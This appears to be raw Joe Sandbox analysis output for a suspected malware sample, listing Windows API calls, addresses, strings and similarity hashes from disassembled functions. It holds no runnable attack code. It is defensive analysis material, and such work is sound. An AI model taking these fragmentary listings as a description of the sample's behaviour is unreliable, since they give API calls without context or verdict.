                                                                        • String ID: blank$info$question$stop$warning
                                                                        • API String ID: 2485277191-404129466
                                                                        • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                        • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                        • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                        • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                        APIs
                                                                        • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                        • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                        • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                        • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                        • GetDesktopWindow.USER32 ref: 0045476F
                                                                        • GetWindowRect.USER32(00000000), ref: 00454776
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                        • GetClientRect.USER32(?,?), ref: 004547D2
                                                                        • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                        • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                        • String ID:
                                                                        • API String ID: 3869813825-0
                                                                        • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                        • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                        • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                        • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 00464B28
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                        • _wcslen.LIBCMT ref: 00464C28
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                        • _wcslen.LIBCMT ref: 00464CBA
                                                                        • _wcslen.LIBCMT ref: 00464CD0
                                                                        • _wcslen.LIBCMT ref: 00464CEF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$Directory$CurrentSystem
                                                                        • String ID: D
                                                                        • API String ID: 1914653954-2746444292
                                                                        • Opcode ID: 99bcfad45e429ddb70241ec9039d6b00caad823fb5156a30212311c37a62d784
                                                                        • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                        • Opcode Fuzzy Hash: 99bcfad45e429ddb70241ec9039d6b00caad823fb5156a30212311c37a62d784
                                                                        • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                        APIs
                                                                        • _wcsncpy.LIBCMT ref: 0045CE39
                                                                        • __wsplitpath.LIBCMT ref: 0045CE78
                                                                        • _wcscat.LIBCMT ref: 0045CE8B
                                                                        • _wcscat.LIBCMT ref: 0045CE9E
                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                        • _wcscpy.LIBCMT ref: 0045CF61
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                        • String ID: *.*
                                                                        • API String ID: 1153243558-438819550
                                                                        • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                        • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                        • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                        • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll
                                                                        • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                        • API String ID: 3832890014-4202584635
                                                                        • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                        • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                        • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                        • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                        • GetFocus.USER32 ref: 0046A0DD
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$CtrlFocus
                                                                        • String ID: 0
                                                                        • API String ID: 1534620443-4108050209
                                                                        • Opcode ID: d723a9665293e74c71492fb3cac70a3bc48f92968cf52f94e307062bf2672283
                                                                        • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                        • Opcode Fuzzy Hash: d723a9665293e74c71492fb3cac70a3bc48f92968cf52f94e307062bf2672283
                                                                        • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                        APIs
                                                                        • DestroyWindow.USER32(?), ref: 004558E3
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateDestroy
                                                                        • String ID: ,$tooltips_class32
                                                                        • API String ID: 1109047481-3856767331
                                                                        • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                        • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                        • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                        • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                        APIs
                                                                        • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                        • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                        • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                        • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                        • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                        • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                        • GetMenuItemCount.USER32 ref: 00468CFD
                                                                        • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                        • GetCursorPos.USER32(?), ref: 00468D3F
                                                                        • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                        • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                        • String ID: 0
                                                                        • API String ID: 1441871840-4108050209
                                                                        • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                        • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                        • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                        • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                        • __swprintf.LIBCMT ref: 00460915
                                                                        • __swprintf.LIBCMT ref: 0046092D
                                                                        • _wprintf.LIBCMT ref: 004609E1
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                        • API String ID: 3631882475-2268648507
                                                                        • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                        • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                        • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                        • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                        APIs
                                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                        • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                        • SendMessageW.USER32 ref: 00471740
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                        • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                        • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                        • SendMessageW.USER32 ref: 0047184F
                                                                        • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                        • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                        • String ID:
                                                                        • API String ID: 4116747274-0
                                                                        • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                        • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                        • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                        • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                        APIs
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                        • _wcslen.LIBCMT ref: 00461683
                                                                        • __swprintf.LIBCMT ref: 00461721
                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                        • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                        • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                        • GetParent.USER32(?), ref: 004618C3
                                                                        • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                        • String ID: %s%u
                                                                        • API String ID: 1899580136-679674701
                                                                        • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                        • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                        • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                        • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                        APIs
                                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                        • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                        • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: InfoItemMenu$Sleep
                                                                        • String ID: 0
                                                                        • API String ID: 1196289194-4108050209
                                                                        • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                        • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                        • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                        • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0043143E
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                        • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                        • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                        • String ID: (
                                                                        • API String ID: 3300687185-3887548279
                                                                        • Opcode ID: 553542ef25fd9631a2b80eb5934e7fdfb419610406a61b9b58c1a15d590a9b60
                                                                        • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                        • Opcode Fuzzy Hash: 553542ef25fd9631a2b80eb5934e7fdfb419610406a61b9b58c1a15d590a9b60
